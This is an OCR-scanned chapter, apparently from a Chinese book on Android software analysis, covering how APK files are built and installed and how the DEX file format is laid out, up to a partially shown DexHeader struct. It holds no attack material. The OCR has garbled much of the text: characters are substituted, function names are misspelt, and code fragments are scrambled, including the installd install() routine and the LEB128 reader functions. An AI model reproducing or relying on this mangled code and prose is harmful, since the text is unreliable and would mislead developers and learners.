可 执行 文件 是 操作 系统 的 基础 ， 它 反映 着 系统 的 运行 机 制 |， 
Android 系 统 的 可 执行 文件 亦 是 如 此 。Google 公 司 使 用 Dalvik 虚 拟 机 作为 
平台 软件 的 运行 环境 ， 并 为 这 个 平台 设计 了 一 个 专用 的 可 执行 文件 格式 
DEX (Dalvik VM executes 的 缩写 ) 。 分 析 Android 程 序 大 多 数 时 间 是 在 
和 DEX 文 件 打交道 ， 只 有 掌握 DEX 文 件 的 格式 才能 更 加 深入 地 理解 
Android 系 统 ， 才 能 对 软件 安全 有 更 深刻 的 认识 。 





4.1 _ Android 程序 的 生成 步 双 


Google 提 供 了 Android SDK 供 程序 员 来 开发 Android 平 台 的 软件 。 
个 软件 在 最 终 发 布 时 会 打包 成 一 个 APK 文 件 ， 将 APK 文 件 传 送 到 
Android 设 备 中 运行 即 可 安装 。APK 是 Android ”Package 的 缩写 ， 功 能 
类 似 于 Symbian 系统 的 SIS 文 件 ， 实 际 上 APK 文 件 驶 是 一 个 zip 压 缩 包 ， 
使 用 zip 格 式 解压 缩 软 件 对 APK 文 件 进行 解压 ， 会 发 现 它 由 一 些 图 片 资 
源 与 其 他 文件 组 成 ， 并 且 每 个 APK 文 件 中 包含 一 个 classes.dex (odex 过 
的 APK 除 外 ， 本 章 后 面 会 详细 讲解 ) ， 这 个 classes.dex 就 是 Android 系 统 
Dalv 这 虚拟 机 的 可 执行 文件 ， 这 里 将 其 简称 为 Dalvik 可 执行 文件 。 

Android 工 程 的 打包 有 两 种 方式 : 一 种 是 使 用 Eclipse 集成 开发 环境 
直接 导出 生成 APK; 男 一 种 是 使 用 Ant 工 具 在 命令 行 方式 下 打包 生成 
APK。 不 管 采 用 哪 一 种 方式 ， 打 包 APK 的 过 程 实质 是 一 样 的 。Android 
的 在 线 开 发 文档 “Develop ~ Tools ~ Building And Running” 中 提供 了 一 张 
APK 文 件 的 构建 流程 图 ， 如 图 4-1 所 示 ， 整 个 编译 打包 过 程 由 多 个 步 又 
和 完成: 





图 4-1 APK 的 打包 过 程 


从 APK 打 包 流 程 图 可 以 看 出 ， 整 个 APK 打 包 过 程 分 为 以 下 七 个 步 








一 步 : 打包 资源 文件 ， 生 成 R.java 文 件 。 打 包 资 源 的 工具 aapt 位 

于 android-sdk\platform-tools 目 录 下 ， 该 工具 的 源码 在 Android 系 统 源码 的 
frameworks\base\tools\aapt 目 录 下 ， 生 成 的 过 程 主要 是 调用 了 aapt 源 码 目 
录 下 Resource.cpp 文 件 中 的 buildResources() 函 数 ， 该 函数 首先 检查 
AndroidManifest.xml 的 合法 性 ， 然 后 对 res 目 录 下 的 资源 子 目 录 进 行 处 
理 ， 处 理 的 函数 a 处 理 的 内 容 包 括 资 源 文件 名 的 
合法 性 检查 ， 向 资源 表 table 添 加 条 目 等 ， 处 理 完 后 调用 
compileResourceFile() 函 数 编 译 res 与 asserts 目 录 下 的 资源 并 生成 
resources.arsc 文 件 ，compileResourceFile() 函 数位 于 aapt 源 码 目录 的 
ResourceTable.cpp 文 件 中 ， 该 函数 最 后 会 调用 parseAndAddEntry() 疯 数 生 
成 R.java 文 件 ， 完 成 资源 编译 后 ， 接 下 来 调 compileXmlFileO 函 数 对 res 
目录 的 子 目 录 下 的 xml 文 件 分 别 进行 编译 ， 这 样 处 理 过 的 xml 文 件 就 简单 
的 被 “加 密 ” 了 ， 最 后 将 所 有 的 资源 与 编译 生成 的 resources.arsc 文 件 以 
及 “加 密 ” 过 的 AndroidManifest.xml 文 件 打包 压缩 成 resources.ap_ 文 件 〈 使 
用 Ant 工 具 命令 行 编译 则 会 生成 与 build.xml 中 “project name” 指定 的 属性 
同名 的 ap_ 文 件 ) 。 

第 二 步 : 处 理 aidl 文 件 ， 生 成 相应 的 Java 文 件 。 对 于 没有 使 用 到 aidl 
的 Android 工 程 ， 这 一 步 可 以 跳 过 。 这 一 步 使 用 到 的 工具 为 aidl， 位 于 
android-sdk\platform-tools 目 录 下 ，aidl 工 具 解 析 接 口 定义 文件 (aid] 为 
android interface definition language 的 首 字 母 缩写 ， 即 Android 接 口 描述 语 
言 ) 并 生成 相应 的 Java 代 码 供 程序 调用 ， 有 兴趣 的 朋友 可 以 查看 它 的 源 
人 码 ， 位 于 Android 源 码 的 frameworks\base\tools\aidl 日 录 be 

第 三 步 : 编译 工程 源 代码 ， 生 成 相应 的 class 文 件 。 这 一 步调 用 javac 











编译 工程 src 目 录 下 所 有 的 java 源 文件 ， 生 成 的 class 文 件 位 于 工程 的 
bin\classes 目 录 下 ， 上 图 4-1 假 定编 译 工程 源 代码 时 程序 是 基于 Android 
SDK 开 发 的 ， 实 际 开发 过 程 中 ， 也 有 可 能 会 使 用 Android ”NDK 来 编 详 
native 代 码 ， 因 此 ， 如 果 可 能 的 话 ， 这 一 步 还 需要 使 用 Android NDK 编 译 
C/C++ 人 代码， 当然， 编译 C/C++ 代码 的 步 又 也 可 以 提前 到 第 一 步 或 第 二 
步 。 

第 四 步 : 转换 所 有 的 class 文 件 ， 生 成 classes.dex 文 件 。 前 面 曾 多 次 
提 到 ，Android 系 统 Dalv 这 虚拟 机 的 可 执行 文件 为 DEX 格 式 ， 程 序 运 行 所 
需 的 classes.dex 束 是 在 这 一 步 生 成 的 ， 使 用 到 的 工具 为 dx， 它 位 于 
android-sdk\platform-tools 目 录 下 ，dx 工 具 主要 的 工作 是 将 Java 字 节 码 转 
换 为 Dalvik 字 节 码 、 压 缩 常 量 池 、 消 除 元 余 信 息 等 。 

第 五 步 : 打包 生成 APK 文 件 。 打 包 的 工具 为 apkbuilder， 它 位 于 
android-sdk\tools 目 录 下 ，apkbuilder 为 一 个 脚本 文件 ， 实 际 调用 的 是 
android-sdk\tools\lib\sdklib.jar 文 件 中 的 
com.android.sdklib.build.ApkBuilderMain 类 。 它 的 实现 代码 位 于 Android 
系统 源码 的 
sdk\sdkmanager\libs\sdklib\src\com\android\sdklib\build\ApkBuilderMain.ja 
va 文件 ， 代 码 构建 了 一 个 ApkBuilder 类 ， 然 后 以 包含 resources.arsc 的 文 
件 为 基础 生成 apk 文 件 ， 这 个 文件 一 般 为 ap_ 结 尾 的 文件 ， 接 着 调用 
addSourceFolder() 函 数 添 加 工程 的 资源 ，addSourceFolderO 会 调用 
processFileForResourceO 函 数 往 apk 文 件 中 添加 资源 ， 处 理 的 内 容 包括 res 
目录 与 assets 目 录 中 的 文件 ， 添 加 完 资 源 后 调用 addResourcesFromJar(O) 函 
数 往 apk 文 件 中 写 入 依赖 库 ， 接 痢 调 用 addNativeLibraries0 函 数 添加 工程 
libs 目 录 下 的 Native 库 (通过 Android NDK 编 译 生成 的 so 或 bin 文 件 ) ， 最 
后 调用 sealApkO 关 闭 apk 文 件 。 

第 六 步 : 对 APK 文 件 进行 签名 。Android 的 应 用 程序 需要 签名 才能 
在 Android 设 备 上 安装 ， 签 名 apk 文 件 有 两 种 情况 : 一 种 是 在 调试 程序 时 








进行 签名 ， 使 用 Eclipse 开发 Android 程 序 时 ， 在 编译 调试 程序 时 会 自己 
使 用 一 个 debug.keystore 对 apk 进 行 签名 ; 另 一 种 是 打包 发 布 时 对 程序 进 
行 签名 ， 这 种 情况 下 需要 提供 了 一 个 符合 Android 开 发 文档 中 要 求 的 签 
名 文件 。 签 名 的 方法 也 有 两 种 : 一 种 是 使 用 JDK 中 提供 的 jarsigner 工 具 
签名 ; 男 一 种 是 使 用 Android 源 人 码 中 提供 的 signapk 工 具 ， 它 的 代码 位 于 
Android 系 统 源码 的 buildools\signapk 目 录 下 。 

第 七 步 : 对 签名 后 的 APK 文 件 进行 对 齐 处 理 。 这 一 步 需 要 使 用 到 的 
工具 为 zipalign， 它 位 于 android-sdk\tools 目 录 ， 源 码 位 于 Android 系 统 源 
人 码 的 build\tools\zipalign 目 录 ， 它 的 主要 工作 是 将 apk 包 进行 对 齐 处 理 ， 
使 apk 包 中 的 所 有 资源 文件 距离 文件 起 始 偏 移 为 4 字 节 整数 倍 ， 这 样 通过 
内 存 映 射 访问 apk 文 件 时 的 速度 会 更 快 ， 验 证 apk 文 件 是 否 对 齐 过 的 工作 
由 ZipAlign.cpp 文 件 的 verifyO 函 数 完成 ， 处 理 对 齐 的 工作 则 由 process0) 函 
数 完成 。 























4.2 Android 程 序 的 安装 流程 


ee 
.系统 程序 安装 : 开机 时 安装 ， 这 类 安装 没有 安装 界面 。 

2. 通过 Android 市 场 安 装 : 直接 通过 Android 市 场 进行 网 络 安装 ， 这 
类 安装 没有 安装 界面 。 

3. ADB 工 具 安 装 : 使 用 ADB 工 具 进行 安装 ， 这 类 安装 没有 安装 界 
面 。 

4. 手机 上 自 带 安装 : 通过 SD 卡 里 的 APK 文 件 安 装 ， 这 类 安装 有 安装 
界面 。 

第 1 种 方式 是 由 开机 时 启动 的 PackageManagerService 服 务 完 成 的 ， 
这 个 服务 在 启动 时 会 扫描 系统 程序 目录 /system/app 并 重新 安装 所 有 程 
序 ; 第 2 种 方式 直接 通过 Android 市 场 下 载 APK 文 件 进行 安装 ， 目 前 国内 
大 多 数 Android 手 机 没有 集成 Google ”Play 商店 ， 用 户 多 数 情况 下 是 使 用 
其 它 的 Android 市 场 来 安装 apk 程 序 ， 这 样 的 话 ， 安 装 方式 与 第 4 种 基本 
一 样 了 ; 第 3 种 方式 比较 简单 ， 使 用 Android SDK 提 供 的 调试 桥 adb 来 安 
装 ， 在 命令 行 下 输入 adb install xxx.apk 《xxx 为 apk 文 件 名 〉 即 可 完成 安 
装 ; 第 4 种 方式 是 通过 点 击 手 机 中 文件 浏览 器 里 面 的 apk 文 件 ， 直 接 调用 
Android 系 统 的 软件 包 packageinstaller.apk 来 完成 安装 。 本 小 节 主 要 通过 
分 析 packageinstaller.apk 的 实现 步骤 来 了 解 apk 文 件 的 安装 过 程 。 

当 用 户 通过 Android 手 机 中 的 文件 管理 程序 定位 到 需要 安装 的 apk 程 
J ne 2 所 示 的 界面 ， 点 击 安 装 按钮 即 可 
开始 安装 ， 点 击 取 消 按钮 则 返 
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图 4-2 APK 程 序 安装 界面 











这 个 安装 界面 其 实 是 Android 系 统 程序 PackageInstaller 的 
PackageInstallerActivity， 当 Android 系 统 请 求 到 需要 安装 apk 程 序 时 ， 会 
局 动 这 个 Activity， 并 接收 通过 Intent 传 递 过 来 的 apk 文 件 信 息 ， 
PackageInstaller 的 源码 位 于 Android 系 统 源码 的 
packages\apps\PackageInstaller 目 录 ， 当 PackageInstallerActivity 局 动 时 ， 
会 首先 初始 化 一 个 PackageManager 与 PackageParser.Package 对 象 ， 接 着 
调用 PackageUtl 类 的 静态 方法 getPackageInfo0 解 析 程 序 包 的 信息 ， 如 果 
这 一 步 解析 出 错 ， 程 序 束 会 失败 返回 ， 如 果 成 功 就 调用 setContentView() 
方法 设置 PackagelInstallerActivity 的 显示 视图 ， 接 着 调用 PackageUtil 类 的 


静态 方法 getAppSnippetO 与 initSnippetForNewApp(0 来 设置 
PackageInstallerActivity 的 控件 显示 程序 的 名 称 与 图 标 ， 最 后 调用 
initiateInstall(0) 方 法 进行 一 些 其 它 的 初始 化 工作 。PackageInstallerActivity 
的 onCreate 代 码 如 下 。 





protected void onCcreate (Bundle icicle) { 
super.onCreate (icicle); 
//get intent information 
final Intent intent = getIntent(); 
mpackageURI = intent.getData{); // 获 取 传 递 过 来 的 apk 文 件 信 息 
mPm = getPackageManager(); // 获 取 包 管理 器 
mPkgInfo = PackageUtil.getPackageInfo (mPackageURI); // 解 析 apk 文 件 


// Check for parse errors 

if(mPkgInfo == nl1) A 
Log.w(TAG, "Parse error when parsing manifest. Discontinuing 
installation"); 
showDialogInner (DLG_PACKAGE_ERROR) ; // 解 析出 错 弹出 出 错 对 话 框 
SetPmResult (PackageManager .INSTALL FAILED INVALID APK); 
return; 


} 


//set view 

setContentView(R.layout.install_start); / /设置 视图 

mIinstallConfirm = findViewById(R.id.install confirm panel); 

mInstallConfirm.setVisibility (View.INVISIBLE).; 

PackageUtil.AppSnippet as = PackageUtil.getAppSnippet (this, 
mpPkgInfo.applicationInfo，mPackageURI); // 获 取 apk 的 程序 名 与 图 标 

PackageUtil.initsnippetForNewapp (this, as, R.id.app_snippet); // 设 置 

apk 的 程序 名 与 图 标 


// Deal with install source. 
String callerPackage = getCallingPackage!(); 
if (callerPackage != null && intent.getBooleanExtra!l 


Intent .EXTRA_NOT UNKNOWN_SOURCE, false)) { 


try { 
mSourceInfo = mpm.getApplicationInfo(callerPackage，0); // 获 取 
程序 信息 
it (mSourceInfo != null) { 
if ((mSourceInfo.flags&ApplicationIinfo.FLAG_SYSTEM) != 0)1{ 


/ /系统 程序 
//! System apps don't need to be approved. 


initiateInstall();// 其 他 初始 化 工作 


return; 


} 
SharedPreferences prefs = getSharedPreferences (PREFS_ 
ALLOWED_SOURCES ，Context .MODE_PRIVATE) ; 
if (prefs.getBoolean(mSourceIinfo.packageName, false)) { 
// User has already allowed this one. 
initiateInstall(); // 其 它 初始 化 工作 
return; 
} 
//ask user to enable setting first 
showDialogInner (DLG_ALLOW_SOURCE) ; // 弹 出 “新 的 应 用 来 源 ” 对 话 框 
return; 
3 
} 
} catch (NameNotFoundException e) { 
} 
} 
// Check unknown sources. 
if (!isInstallingUnknownAppsAllowed()) { 


//ask user to enable setting first 


showDialogInner (DLG_UNKNOWN_APPS); /1 弹出 启用 “未 知 来 源 ” 对 话 框 
return; 

} 

initiateInstall(); // 其 他 初始 化 工作 


整个 onCreate() 方 法 有 两 个 函数 是 重点 : 一 个 是 PackageUtil 的 
getPackagelInfo() 方 法 ; 男 一 个 是 initiateInstall() 方 法 。getPackagelInfo() 方 
法 中 首先 通过 packageURI 获 取 到 apk 文 件 的 路 径 ， 然 后 构造 了 一 个 
PackageParser 对 象 ， 最 后 调用 PackageParser 对 象 的 parsePackage() 方 法 解 
析 apk 程 序 包 ，parsePackage() 方 法 代码 比较 长 ， 大 致 代码 如 下 。 


public Package parSsePackage (File sourceFile, String destCcodqePath ， 

DisplayMetrics metrics, int flags) 1{ 

fz 并 
assmgr = new AssetManager () ; 
int cookie = assmgr.addAssetPath (maArchiveSourcePath) ; 

} catch (Exception e) { 
Slog.w(TAG, "Unable to read AndroidManifest.xml of " 

+ mArchiveSourcepPath, e); 


Cr 渤 
// XXXX todo: need to figure out correct configuration. 
pkg = parsePackage (res, parser, flags, errorText); 


} catch (Exception e) { 


return pkg:; 
} 


parsePackage() 调 用 了 男 一 个 版 本 的 parsePackage() 方 法 ， 代 人 码 如 


private Package ParSsePackage ( 
Resources res, XmlResourceParser parser, int flags, String[] outError) 
throws XmlPullParserException, IOException { 


nme 


String pkgName = parsePackageName (parser, attrs, flags, outError); 


final Package pkg = new Package (pkgName); 


while ((type = parser.next()) != XmlPullParser .END DOCUMENT 
&& (type != XmlPullParser.END TAG | | parser.getDepth() > outerDepth)) { 
if (type == XmlPullParser.END_ TAG || type == XmlPullParser.TEXT) { 
continue; 


} 
String tagName = parser.getName(); 
it (tagName.equals("application")) { 


foundApp = true; 


if (!parseApplication(pkg, res, parser, attrs, flags, outError)) ({ 
Yeturn mull 


} 
} else if (tagName.equals ("permission-group")) { 
} 
else if (tagName.equals("eat-comment")) { 


et 


} else if (RIGID_PARSER) { 


} else { 
Slog.w(TAG, "Unknown element under <manifest>: " +parser.getName!() 
+ "at "+ mArchiveSourcePath + " " 
+ parser.getPositionDescription()); 
XmlUtils.skipCurrentTag (parser); 


continue; 


return pkg; 


代码 首先 调用 parsePackageName() 方 法 从 AndroidMenifest.xml 文 件 中 
获取 程序 包 名 ， 接 着 构建 了 一 个 Package 对 象 ， 接 下 来 挨个 处 理 





AndroidMenifest.xml 文 件 中 的 标签 ， 处 理 application 标 签 使 用 了 
parseApplication() 方 法 ， 后 者 解析 activity、receiver、service、provider 并 
将 它们 添加 到 传递 进来 的 Package 对 象 的 ArrayList 中 。 

onCreate() 方 法 中 getPackageInfo0 返 回 后 调用 了 initiateInstall0)， 
initiateInstall0 检 测 该 程序 是 否 已 经 安装 ， 然 后 分 别 调 用 
startInstallConfirm() 显 示 安 装 界 面 或 调用 showDialogInner 
(DLG_REPLACE_APP) 弹 出 蔡 换 程序 对 话 框 。startInstallConfirm() 方 法 
设置 了 安装 与 取消 按钮 的 监听 器 ， 最 后 是 onClick(0) 方 法 的 按钮 点 击 啊 应 
了 ， 安 装 按钮 使 用 startActivity(0) 方 法 启动 了 一 个 Activity 类 
InstallAppProgress.class，InstallAppProgress 类 在 初始 化 onCreate() 方 法 中 
调用 了 initView0， 后 者 最 终 调 用 了 PackageManager 的 installPackage() 方 
法 来 安装 apk 程 序 。installPackage() 为 PackageManager 类 的 一 个 虚 函 数 ， 
PackageManagerService.java 实 现 了 它 ，installPackage() 调 用 了 
installPackageWithVerification() 方 法 ， 该 方法 首先 验证 调用 者 是 否 具 有 
程序 安装 的 权限 ， 最 后 通过 消息 处 理 的 方式 调用 processPendingInstall() 
进行 安装 ，PprocessPendingInstall0 又 调用 了 installPackageLIO， 
installPackageLIO 方 法 经 过 一 阵 验证 折腾 ， 最 终 调 用 replacePackageLIO 
或 installNewPackageLI0 来 蔡 换 或 安装 程序 ， 代 码 如 下 : 

















private void installPackageLI (InstallArgs args, 
boolean newInstall, PackageInstalledInfo res) { 
int pFlags = args. flags; 
String installerPackageName = args.installerPackageName; 


File tmpPackageFile = new Filel(args.getCodePath!()); 


// Set application objects path explicitly after the rename 
setApplicationInfoPaths (pkg, args .getCodePath(), args.getResourcePath()); 
pkg.applicationInfo.nativeLibraryDir = args.getNativeLibraryPath(); 
if (replace) { 
replacePackageLI (pkg，parseFlags，scanMode，// 替 换 已 安装 的 程序 
installerPackageName, res); 
} else { 
installNewPackageLI (pkg，parseFlags，scanMode，// 安 装 新 程序 
installerPackageName, res); 


} 


安装 与 蔡 换 操作 的 代码 都 比较 长 ， 但 它们 最 终 都 会 调用 

scanPackageLI() 方 法 ，scanPackageLI() 会 实例 化 一 个 PackageParser 对 
象 ， 然 后 调用 其 parsePackage0) 方 法 来 解析 apk 程 序 包 ， 代 码 的 最 后 又 调 
用 了 scanPackageLI(0 的 男 一 个 版 本 ， 第 二 个 版 本 的 scanPackageLI() 完 成 
apk 的 依赖 库 检 测 、 签 名 的 验证 、sharedUser 的 签名 检查 、 更 新 Native 库 
目录 文件 、 组 件 名 称 的 检查 等 工作 ， 最 后 调用 minstaller 的 install0) 方 法 来 
安装 程序 。mInstaller 为 Installer 类 的 一 个 实例 ，Installer 类 的 源码 位 于 
Android 源 人 码 
frameworks\base\services\java\com\android\server\pm\Installer.java 文 件 ， 
tO sia name uid gid” 后 调用 transaction() 方 法 ， 通 

过 socket 问 /system/bin/installd 程 序 发 送 install 指 令 ，installd 的 源码 位 于 
frameworks\base\cmds\installd 目 录 ， 这 个 程序 是 开机 后 常 驻 于 内 存 中 
的 ， 可 以 通过 在 adb ”shell 下 运行 “ps|grep/system/bin/installd” 查 看 进程 信 
息 。installd 处 理 install 指 令 的 函数 为 installd.c 文 件 中 的 do_install0)， 
do_install(0) 调 用 了 install()， 后 者 在 commands.c 文 件 中 有 它 的 实现 代码 。 
大 致 如 下 : 





int install (const char *pkgname, 


if (create_pkg_path(Pkgdir，Pkgname， 


} 

if (mkdir(pkgdir, 
ALOGE ("cannot 
return -errno; 

} 

if (chmod (pkgdir, 
ALOGE ("cannot 
unlink (pkgdir); 
return -errno; 

} 

if (mkdir(libdir, 
ALOGE ("cannot 
unlink (pkgdir) 
return -errno; 

} 

if (chmod(libdir, 
ALOGE ("cannot 
unlink (libdir); 
unlink (pkgdir); 
return -errno; 

} 

if (chown(libdir, 
ALOGE ("cannot 
unlink(libdir); 
unlink (pkgdir) 
return -errno; 

} 

if (chown (pkgdir, 
ALOGE ("cannot 
unlink(libdir); 
unlink (pkgdir); 
return. -errnos 

2. 

return 0; 


ALOGE ("cannot 
return -1; 


(create pkg_path(libdir, pkgname, 


ALOGE ("cannot 


return -1; 


Tt mid, Gig tt gid 


PKG_DIR_POSTFIX，0)) { // 创 建 包 路 径 


create package path\n"); 


PKG_LIB_POSTFIX,，0)) { // 创 建 库 路 径 


create package lib path\n"); 


0751) < 0) { // 创 建 包 目录 


create dir '%s': %s\n"，Pkgdqir，Strerror(errno) ) ; 


0751) < 0) { // 设 置 包 目 录 权 限 

chmod dir '$%s': g%SsSNn"，PDPkgdir，sSstrerror (errno)); 
0755) < 0) { / /创建 库 目 录 

create dir '%s': %s\n", libdir, strerror (errno)); 
753) wr QW HF // 设 置 库 目 录 权限 

chmod dir '%s': ®%s\n", libdir, strerror (errno)); 


‘ 


D 


AID_SYSTEM, AID_SYSTEM) < 0) { // 设 置 库 目录 的 所 有 者 


chown dir '$%sS': %s\n", libdir, strerror (errno)); 
uids gadj < 0) * 1/ 设置 包 目录 的 所 有 者 
chown dir ‘'%s': %s\n", pkgdir, strerror (errno)); 


' 


地 


install() 执 行 完 后 ， 会 通过 socket 回 传 结 果 ， 最 终 PackagelInstaller 根 
据 返 回 结果 做 出 相应 的 处 理 ， 至 此 ， 一 个 apk 程 序 就 安装 完成 了 。 





4.3 ”dex 文件 格式 


在 Android 4.0 源 码 Dalvik/docs 目 录 下 提供 了 一 份 文档 dex- 
format.html， 里 面 详 细 的 介绍 了 了 dex 文件 格式 以 及 使 用 到 的 数据 结构 。 与 
Dalvik 指 令 集 文档 一 样 ， 该 文档 在 Android 4.1 源 码 中 也 已 经 去 除 。 


4.3.1 dex 文 件 中 的 数据 结构 


开始 讲解 dex 文 件 格式 前 ， 先 看 看 dex 文 件 中 用 到 的 数据 类 型 。 如 表 
4-1 所 示 。 


表 4-1 dex 文 件 使 用 到 的 数据 类 型 

等 同 于 uint8 t， 表 示 1 字 节 的 无 符号 数 
等 同 于 uint16_t， 表 示 2 字 节 的 无 符号 娄 

u4 等 同 于 uint32 t， 表 示 4 字 节 的 无 符号 数 

u8 等 同 于 uint64_t， 表 示 8 字 节 的 无 符号 数 

sleb128 有 符号 LEB128， 可 变 长 度 1~5 字 节 

uleb128 无 符号 LEB128， 可 变 长 度 1~5 字 节 
无 符号 LEB128 值 加 1， 可 变 长 度 1~5 字 节 

ul~u8 很 好 理解 ， 表 示 1 到 8 字 节 的 无 符号 数 ， 而 sleb128、uleb128 

与 uleb128p1 则 是 dex 文 件 中 特有 的 LEB128 数 据 类 型 。 其 中 ， 每 个 
LEB128 由 1 一 5 个 字 节 组 成 ， 所 有 的 字 节 组 合 在 一 起 表示 一 个 32 位 的 数 
据 ， 如 图 4-3 所 示 ， 每 个 字 节 只 有 7 位 为 有 效 位 ， 如 果 第 1 个 字 节 的 最 高 
位 为 1， 表 示 LEB128 需 要 使 用 到 第 2 个 字 节 ， 如 果 第 2 个 字 节 的 最 高 位 为 
1， 表 示 会 使 用 到 第 3 个 字 节 ， 以 此 类 推 ， 直 到 最 后 的 字 节 最 高 位 为 0， 
当然 ，LEB128 最 多 只 会 使 用 到 5 个 字 节 ， 如 果 读 取 5 个 字 节 后 下 一 个 字 
节 最 高 位 仍 为 1， 则 表示 该 dex 文 件 无 效 ，Dalvik 虚 拟 机 在 验证 dex 时 会 失 









































败 返 回 。 


Bitwise diagram of a two-byte LEB128 value 
First byte Second byte 
1 bit6 bits bita bit3 bit2 bitl bito 10 bit13 bit12 bit1l bit1o bito bitg bit7 


图 4-3 LEB128 数 据 类 型 


在 Android 系 统 源 码 dalvik\libdex\Leb128.h 文 件 中 可 以 找到 LEB128 的 
实现 ， 读 取 无 符号 LEB128 (uleb128) 数据 的 代码 如 下 : 


DEX_INLINE int readUnsignedLebl28(const ul** pStream) { 


Const Ui* pt = “potreams 
int result = *(ptr++); 
Tf [esiLb S OxTE) 汪 // 大 于 0x7f 表 示 第 1 个 字 节 最 高 位 为 1 
int cur = *(ptr++); // 第 2 个 字 节 
result = (result & 0x7f) | ((cur & 0x7f) << 7); // 前 2 个 字 节 组 合 
EF (eur Ss DxRs) * // 大 于 0x7f£f 表 示 第 2 个 字 节 最 高 位 为 1 
SUE "(Dt // 第 3 个 字 节 
result |= (cur & 0x7f) << 14; // 前 3 个 字 节 的 组 合 
CE OTEY 4 
Our = (PLETE / /第 4 个 字 节 
result |= (cur & 0x7f) << 21; // 前 4 个 字 节 的 组 合 
TE (en SS Oa 区 
cur = * (ptr++); 7/ 第 5 个 字 节 
result |= cur << 28; // 前 5 个 字 节 的 组 合 
} 


} 
*pStream = ptr; 


return result; 
} 
对 于 有 符号 的 LEB128 (sleb128) 来 说 ， 计 算 方 法 与 无 符号 的 


LEB128 是 一 样 的 ， 只 是 对 无 符号 LEB128 最 后 一 个 字 节 的 最 高 有 效 位 进 
行 了 符号 扩展 。 读 取 有 符号 LEB128 数 据 的 代码 如 下 : 














DEX_INLINE int readSignedLebl28(const ul** pStream) { 
const ul* ptr = *pStream; 
int result = *(ptr++); 


证 es = xj // 小 于 0x7f 表 示 第 1 个 字 节 的 最 高 位 不 为 1 
result = (result < 25) 3> 25; // 对 第 1 个 字 节 的 最 高 有 效 位 进行 符号 扩展 
} else { 
int eur = *(ptr++); /1/ 第 2 个 字 节 
result = (result & 0x7f) | ((cur & 0x7f) << 7); // 前 2 个 字 节 组 合 
1 (aur <e: (KZE) 4 
result = (result << 18) >> 18; // 对 结果 进行 符号 位 扩展 
} else { 
cur = *(ptr+t+); // 第 3 个 字 节 
Fesule: | (cor &. (rE7EY) < das // 前 3 个 字 节 组 合 
Vemur = 0x7E)} 球 
result = (result << 11) >> 11; /1 对 结果 进行 符号 位 扩展 
} else { 
Cur = *(ptr++); // 第 4 个 字 节 
result |= {cur & 0x7£f) << 21; /1 前 4 个 字 节 组 合 


i (Ear: Ke HRTEY 
result = (result << 4) >> 4; // 对 结果 进行 符号 位 扩展 


} else { 
Cur = *(ptr++); // 第 5 个 字 节 
result |= eur << 28; // 前 5 个 字 节 组 合 
} 


} 

*pStream = ptr; 

return result; 
} 


uleb128p1 类 型 很 简单 ， 它 的 值 为 uleb128 的 值 加 1。 

以 字符 序列 “c0 83 92 25” 为 例 ， We 

第 1 个 字 节 0xc0 大 于 0x7f， 表 示 需 要 用 到 第 2 个 字 节 。result1 
& Ox7f 

第 2 个 字 节 0x83 大 于 0x7f， 表 示 需 要 用 到 第 3 个 字 节 。result2 
result1 + (0x83 & Ox7f) << 7 

第 3 个 字 节 0x92 大 于 0x7f， 表 示 需 要 用 到 第 4 个 字 节 。result3 = 
result2 + (Ox92 & Ox7f) << 14 


Oxc0 





第 4 个 字 节 0x25 小 于 0x7f， 表 示 到 了 结尾 。result4 = result3 + (0x25 
& Ox7f) << 21 

最 后 计算 结果 为 0x40 + 0x180 + 0x48000 + 0x4a00000 = 0x4a481c0 

以 字符 序列 “dl c2 b3 40” 为 例 ， 计 算 它 的 sleb128 值 。 

第 1 个 字 节 0xd1 大 于 0x7f， 表 示 需 要 用 到 第 2 个 字 节 。resultl = 0xd1 
& Ox7f 

第 2 个 字 节 0xc2 大 于 0x7f， 表 示 和 需要 用 到 第 3 个 字 市 。result2 
resultl + (Oxc2 & Ox7f) << 7 

第 3 个 字 节 0xb3 大 于 0x7f， 表 示 需 要 用 到 第 4 个 字 市 。result3 
result2 + (Oxb3 & Ox7f) << 14 

第 4 个 字 节 0x40 小 于 0x7f， 表 示 到 了 结尾 。result4 = (( result3 + (0x40 
& Ox7f) << 21) << 4) >> 4 

最 后 计算 结果 为 ((0x51 + 0x2100 + 0xcc000 + 0x8000000) << 4 ) >>4 
= 0xf80ce151 


4.3.2 dex 文件 整体 结构 


dex 文 件 的 整体 结构 比较 简单 ， 它 是 由 多 个 结构 体 组 合 而 成 的 。 如 
图 4-4 所 示 ， 一 个 dex 文 件 由 7 个 部 分 组 成 。dex header 为 dex 文 件 涉 ， 它 指 
定 了 dex 文 件 的 一 些 属性 ， 并 记录 了 其 它 6 部 分 数据 结构 在 dex 文 件 中 的 
物理 偏 移 。string_ids 到 class_def 结 构 可 以 理解 为 “索引 结构 区 ”， 真 实 的 
数据 存放 在 data 数 据 区 ， 最 后 的 link_data 为 静态 链接 数据 区 ， 对 于 目前 
生成 的 dex 文 件 而 言 ， 它 始终 为 空 。 


























dex header 
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图 4-4 dex 文件 结构 


未 经 过 优化 的 dex 文 件 结构 表示 如 下 。 


struct DexFile { 


DexHeader Header; 

DexSstringId StringIds[stringIdsSizel]; 
DexTypeId TypeIds [typelIdsSizel]; 
DexProtoId ProtoIds [protoIdsSizel]; 
DexFieldId FieldIds[fieldIidsSize]; 
DexMethodId MethodIds [methodIdsSizel]; 
DexClassDef ClassDefs[classDefsSizel]; 
DexData Datal[ll]:; 

DexLink LinkData,; 


}; 

DexFile 结 构 的 声明 在 Android 系 统 源码 dalvik\ibdex\DexFile.h 文 件 
中 。 请 注意 : 笔者 在 这 里 列 出 的 DexFile 结 构 与 DexFile.h 文 件 中 定义 的 有 
所 不 同 ， 后 者 定义 的 DexFile 结 构 为 dex 文 件 被 映射 到 内 存 中 的 结构 ， 保 
存 的 是 各 个 结构 的 指针 ， 其 中 还 包含 了 DexOptHeader 与 DexFile 尾 部 的 
附加 数据 〈DexOptHeader 会 在 4.4.3 节 进行 介绍 ) 。DexHeader 结 构 占用 
0x70 个 字 节 ， 它 的 声明 如 下 。 








struct DexHeader { 


ul 
u4 
EL 
U4 
U4 
ud4d 
ud4d 
U4 
ud4 
u4 
u4 
ud 
ud4d 
ud 
u4 
U4 
u4 
u4 
u4 
ud4d 
ud 
ud4d 
ud 
}; 


magic[8]; 


checksum; 


signature[kSHAlDigestLen]; 


fileSize; 
headerSize; 
endianTag; 
linkSize; 
linkOff; 
mapoff; 
stringIdsSize; 
stringIdsOff; 
typeIdsSize; 
typeIdsOff; 
protoIdsSize; 
protoIdsOff; 
fieldIidsSize; 
fieldIdsOoff; 
